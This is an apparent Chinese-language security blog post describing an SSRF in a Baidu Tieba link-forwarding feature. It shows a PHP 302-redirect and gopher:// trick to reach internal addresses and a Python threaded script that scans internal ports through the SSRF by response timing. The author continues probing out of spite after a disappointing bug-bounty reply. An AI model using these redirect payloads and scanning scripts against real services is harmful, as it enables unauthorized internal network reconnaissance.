

<!DOCTYPE html>
<html lang="">
<head>
  


<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>BaiDu-SSRF [ Wanan&#39;s Blog ]</title>

  <link rel="icon" href="/img/favicon.ico">


    <meta name="author" content="Wanan">


    <meta name="subtitle" content="Wanan's Blog">


    <meta name="Description" content="Hello,here is Wanan&#39;s Blog">



  <link rel="alternate" href="/atom.xml " title="Wanan&#39;s Blog" type="application/atom+xml">


  
    <link rel="stylesheet" href="/css/main.css">
  

<meta name="generator" content="Hexo 5.4.0"></head>
  <body data-theme="light" class="notransition">
    <script>
      const body = document.body;
      const data = body.getAttribute("data-theme");
      const initTheme = (state) => {
        if (state === "dark") {
          body.setAttribute("data-theme", "dark");
        } else if (state === "light") {
          body.removeAttribute("data-theme");
        } else {
          localStorage.setItem("theme", data);
        }
      };
   
      initTheme(localStorage.getItem("theme"));
      
      setTimeout(() => body.classList.remove("notransition"), 75);
    </script>
  <div class="navbar" role="navigation">
    <nav class="menu">
      <input type="checkbox" id="menu-trigger" class="menu-trigger" />
      <label for="menu-trigger">
        <span class="menu-icon">
          <svg
            xmlns="http://www.w3.org/2000/svg"
            width="24"
            height="24"
            viewBox="0 0 512 512"
          >
            <path
              d="M64,384H448V341.33H64Zm0-106.67H448V234.67H64ZM64,128v42.67H448V128Z"
            />
          </svg>
        </span>
      </label>
      <a id="mode">
        <svg
          class="mode-sunny"
          xmlns="http://www.w3.org/2000/svg"
          width="24"
          height="24"
          viewBox="0 0 512 512"
        >
          <title>LIGHT</title>
          <line
            x1="256"
            y1="48"
            x2="256"
            y2="96"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="256"
            y1="416"
            x2="256"
            y2="464"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="108.92"
            x2="369.14"
            y2="142.86"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="369.14"
            x2="108.92"
            y2="403.08"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="464"
            y1="256"
            x2="416"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="96"
            y1="256"
            x2="48"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="403.08"
            x2="369.14"
            y2="369.14"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="142.86"
            x2="108.92"
            y2="108.92"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <circle
            cx="256"
            cy="256"
            r="80"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
        </svg>
        <svg
          class="mode-moon"
          xmlns="http://www.w3.org/2000/svg"
          width="24"
          height="24"
          viewBox="0 0 512 512"
        >
          <title>DARK</title>
          <line
            x1="256"
            y1="48"
            x2="256"
            y2="96"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="256"
            y1="416"
            x2="256"
            y2="464"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="108.92"
            x2="369.14"
            y2="142.86"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="369.14"
            x2="108.92"
            y2="403.08"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="464"
            y1="256"
            x2="416"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="96"
            y1="256"
            x2="48"
            y2="256"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="403.08"
            y1="403.08"
            x2="369.14"
            y2="369.14"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <line
            x1="142.86"
            y1="142.86"
            x2="108.92"
            y2="108.92"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
          <circle
            cx="256"
            cy="256"
            r="80"
            style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"
          />
        </svg>
      </a>
      <div class="trigger">
        <div class="trigger-container">
          
            
            
            
            
            
            
            <a class="menu-link " href="/"> Home</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/about/"> About</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/archives/"> Archives</a>
          
            
            
            
            
            
            
            <a class="menu-link " href="/tags/"> Tags</a>
          
        </div>
      </div>
    </nav>
  </div>
  
<div class="wrapper post">
  <main class="page-content" aria-label="Content">
      <header class="header">
        
        <h1 class="header-title" itemprop="headline">BaiDu-SSRF</h1>
          <div class="post-meta">
            <time>Feb 18, 2022</time>
            <span itemprop="author">
              <span itemprop="name">Wanan</span>
            </span>
          </div>
        </header>

          <div class="page-content"><h1 id="This-is-my-wife"><a href="#This-is-my-wife" class="headerlink" title="This is my wife"></a>This is my wife</h1><p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzhw8flnonj20rs0qjwil.jpg" alt="mywife"></p>
<hr>
<h1 id="发现过程"><a href="#发现过程" class="headerlink" title="发现过程"></a>发现过程</h1><p>百度贴吧是有个站子转发功能的，文章转发这种地方是存在ssr最大的可疑性的地方之一！<br>首先看到转发时是带有ur参数请求的，百度转发–＞获取url参数数值–＞请求该地址–&gt;获取返回信息<br>我先赋值了一个dnslog 平台域名，发现返回了来自百度的ip</p>
<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzhwdrjxwpj20dr062wel.jpg" alt="dnslog"><br>是的，是来自某度某机房的请求<br>小tips：【测试的时候打开f12的network，看看有没有出现你请求的地址。如果没有那可能就是他的服<br>务器的请求，如果有那就是你本地的请求了。】<br>这时我尝试着访问内网P， &lt;127.0.0.1&gt;，哦不这大扯淡了。如果这个请求成功那真的很不现实了。<br>我询问了百度的VR小姐姐，得到了他们的ssrf测试接口：10.199.7.105<br>这时候我再去请求这个接口，发现失败了。但是我坚信这个地方存在ssr<br>我抽了根烟思考了一会，想到利用302跳转测试。详细php后端代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  header(<span class="string">&quot;Location:http:://my service ip:port&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后向url参数赋值<a target="_blank" rel="noopener" href="http://www.xxx.com/xxx.php">http://www.xxx.com/xxx.php</a> 等待了一会会我看见了远程服务器收到了请求</p>
<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzhwe53gmbj20wn0ap0uz.jpg" alt="myservice"></p>
<p>可以看见X-Real-IP: 是来自内网的ip段,确定了302跳转，可以绕过内网限制进行一个成功的ssrf内网请求,我提交了这个漏洞。</p>
<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzhwptd90jj20d303k74f.jpg" alt="bsrc"></p>
<p>但某度这个回应属实给我整笑了。那我就对你的系统造成点影响吧。</p>
<hr>
<h1 id="深入探测"><a href="#深入探测" class="headerlink" title="深入探测"></a>深入探测</h1><p>继续用302跳转对ssrf接口进行内网端口探测，发现失败了。后期不知道为什么坚持了一下加了行:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$port</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;p&#x27;</span>]; </span><br></pre></td></tr></table></figure>

<p>并且把协议由http改为了gopher。</p>
<p>完整的就是：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  <span class="variable">$port</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;p&#x27;</span>]; </span><br><span class="line">  header(<span class="string">&quot;Location:gopher://my service ip:<span class="subst">$port</span>&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>带上端口去请求接口的80端口【<a target="_blank" rel="noopener" href="http://www.xxx.com/xxx.php?p=80%E3%80%91%EF%BC%8C%E6%88%91%E5%8F%91%E7%8E%B0%E6%97%B6%E9%97%B4%E9%82%A3%E9%87%8C%EF%BC%8C%E5%87%BA%E7%8E%B0%E4%BA%86%E4%B8%8D%E4%B8%80%E6%A0%B7%E7%9A%84%E6%98%BE%E7%A4%BA,%E6%9C%80%E5%90%8E%E9%80%9A%E8%BF%87%E5%9B%9E%E6%98%BE%E7%9A%84%E6%97%B6%E9%97%B4%E8%BF%9B%E8%A1%8C%E5%88%A4%E6%96%AD%E6%98%AF%E5%90%A6%E6%88%90%E5%8A%9F%E3%80%82">http://www.xxx.com/xxx.php?p=80】，我发现时间那里，出现了不一样的显示,最后通过回显的时间进行判断是否成功。</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">大于&gt; 2.6s --&gt; 不存在 超时  </span><br><span class="line">小于&lt; 1s  --&gt; 存在 可以连接</span><br></pre></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzhwprwkx9j21xz0s5n0j.jpg" alt="out"></p>
<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzhwpq1h46j20lh0pfgnc.jpg" alt="yes"></p>
<p>确认了成功访问了ssrf测试接口以后，我写了一段探测脚本，对ssrf接口进行了端口探测</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> queue</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">threads_count = <span class="number">2</span></span><br><span class="line">que = queue.Queue()</span><br><span class="line">lock = threading.Lock()</span><br><span class="line">threads = []</span><br><span class="line">ssrf_url = <span class="string">&quot;http://xxx.baidu.com/xxx/xxx/xxx/xxx?url=&quot;</span></span><br><span class="line">test_url = <span class="string">&quot;https://xxx.xxx.com/xxx/xxx.php?p=&quot;</span></span><br><span class="line">ua = &#123;</span><br><span class="line">    <span class="string">&#x27;User-Agent&#x27;</span>:<span class="string">&#x27;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;Accept&#x27;</span>: <span class="string">&#x27;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;Host&#x27;</span>: <span class="string">&#x27;xxx.baidu.com&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;Accept-Language&#x27;</span>: <span class="string">&#x27;zh-CN,zh;q=0.9,en;q=0.8&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;Cookie&#x27;</span>: <span class="string">&#x27;xxxxxxxx&#x27;</span></span><br><span class="line">    &#125;</span><br><span class="line">ports = [<span class="number">21</span>,<span class="number">22</span>,<span class="number">23</span>,<span class="number">25</span>,<span class="number">69</span>,<span class="number">80</span>,<span class="number">81</span>,<span class="number">82</span>,<span class="number">83</span>,<span class="number">84</span>,<span class="number">110</span>,<span class="number">389</span>,<span class="number">443</span>,<span class="number">445</span>,<span class="number">488</span>,<span class="number">3389</span>,<span class="number">512</span>,<span class="number">3306</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> ports:</span><br><span class="line">    que.put(<span class="built_in">str</span>(i))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">run</span>():</span></span><br><span class="line">    <span class="keyword">while</span> que.qsize() &gt; <span class="number">0</span>:</span><br><span class="line">        p = que.get()</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            poc = ssrf_url+test_url+<span class="string">&quot;&#123;port&#125;&quot;</span>.<span class="built_in">format</span>(port=p)</span><br><span class="line">            r = requests.get(poc,headers=ua,timeout=<span class="number">2.3</span>)</span><br><span class="line">            result = <span class="string">&quot;&#123;port&#125; 存在&quot;</span>.<span class="built_in">format</span>(port=p)</span><br><span class="line">            <span class="built_in">print</span>(result)</span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            result = <span class="string">&quot;&#123;port&#125; 不存在&quot;</span>.<span class="built_in">format</span>(port=p)</span><br><span class="line">            <span class="built_in">print</span>(result)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(threads_count):</span><br><span class="line">    t = threading.Thread(target=run)</span><br><span class="line">    threads.append(t)</span><br><span class="line">    t.setDaemon(<span class="literal">True</span>)</span><br><span class="line">    t.start()</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> que.qsize() &gt; <span class="number">0</span>:</span><br><span class="line">    time.sleep(<span class="number">1.0</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzhwpoi6rgj20m20ydgp7.jpg" alt="python"></p>
<hr>
<h1 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h1><p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzhwxao6odj20oz00zt8m.jpg" alt="image-20220218195803885"></p>
<p>哎，太低了 我以后不会再来了。</p>
</div>
          <nav class="post-nav">
    
    
    <a class="post-nav-item post-nav-next" href="/2022/01/31/About-Eyes-Searching/">
      <div class="nav-arrow">OLDER&nbsp;&gt;</div>
      <span class="post-title">About-Eyes-Searching</span>
    </a>
    
  </nav>

   </main>
</div>

  <footer class="footer">
    <small class="footer_copyright">
      <div id="bottom-inner">
        © 2021 Site by Wanan using
        <a target="_blank" rel="noopener" href="http://hexo.io">hexo blog framework</a>.
        <br>
        <p> Theme is <a target="_blank" rel="noopener" href="https://github.com/dewjohn/hexo-theme-klise">Klise</a></p>
      </div>
    </small>
  </footer>
  
  

    
      <script src="/js/main.js"></script>
    
  
  <script>
    window.FPConfig = {
      delay: 0,
      ignoreKeywords: [],
      maxRPS: 3,
      hoverDelay: 50,
    };
  </script>
  <script defer src="https://cdn.jsdelivr.net/gh/gijo-varghese/flying-pages@2.1.2/flying-pages.min.js"></script>
</body>
</html>
